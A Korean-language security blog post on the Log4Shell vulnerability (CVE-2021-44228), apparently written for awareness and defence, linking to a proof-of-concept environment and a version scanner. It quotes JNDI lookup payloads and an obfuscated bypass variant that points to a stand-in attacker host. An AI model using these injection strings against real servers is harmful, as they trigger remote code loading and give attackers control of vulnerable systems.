Apache Log4j 2 취약점 (CVE-2021-44228 / Log4Shell) PoC 및 취약점 스캐너
* 공격 구문 형식
- 주요 공격구문 : ${jndi:ldap://xxx.xxx.xxx/z} , ${jndi:rmi://xxx.xxx.xxx/z}
- HTTP URL, Header, body에 삽입하여 다수 공격 시도 (Zgrab과 같은 취약점 스캐너를 이동한 자동화 공격)
- 대소문자 및 아래와 같은 변형된 형식으로 인입도 가능.
ex) ${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//somesitehackerofhell.com/z}
- 출처 : https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words
GitHub - Puliczek/CVE-2021-44228-PoC-log4j-bypass-words: 🐱💻 ✂️ 🤬 CVE-2021-44228 - LOG4J Java exploit - A trick t
🐱💻 ✂️ 🤬 CVE-2021-44228 - LOG4J Java exploit - A trick to bypass words blocking patches - GitHub - Puliczek/CVE-2021-44228-PoC-log4j-bypass-words: 🐱💻 ✂️ 🤬 CVE-2021-44228 - LOG4J Java exploit - A t...
github.com
* 현재 공유된 CVE-2021-44228 PoC
- 취약 어플리케이션으로 docker image로 제공
- 출처: https://www.lunasec.io/docs/blog/log4j-zero-day/
Log4Shell: RCE 0-day exploit found in log4j 2, a popular Java logging package | LunaSec
Given how ubiquitous log4j is, the impact of this vulnerability is quite severe. Learn how to patch it, why it's bad, and more in this post.
www.lunasec.io
* CVE-2021-44228 취약점 스캐너
- Window, Linux, Unix 환경에서 Log4j2 취약 버전 사용 유무 체크
- 출처 : https://github.com/logpresso/CVE-2021-44228-Scanner
GitHub - logpresso/CVE-2021-44228-Scanner: Vulnerability scanner and mitigation patch for Log4j2 CVE-2021-44228
Vulnerability scanner and mitigation patch for Log4j2 CVE-2021-44228 - GitHub - logpresso/CVE-2021-44228-Scanner: Vulnerability scanner and mitigation patch for Log4j2 CVE-2021-44228
github.com
'IT Security > Vulnerability' 카테고리의 다른 글
| 취약점) Log4Shell 취약점 점검 스캐너 - logpress (CVE-2021-44228 / CVE-2021-45046) (3) | 2021.12.16 |
|---|---|
| [긴급] 취약점) CVE-2021-45046 - Apache Log4j2 신규 취약점 발견 및 패치 배포 (21.12.15) (0) | 2021.12.15 |
| [긴급] 취약점) Apache Log4j 2 취약점 (CVE-2021-44228) (0) | 2021.12.12 |
| 취약점) XXE Injection (0) | 2021.11.01 |
| 취약점) CVE-2019–11581 Jira 원격 코드 실행 취약점 (0) | 2020.04.05 |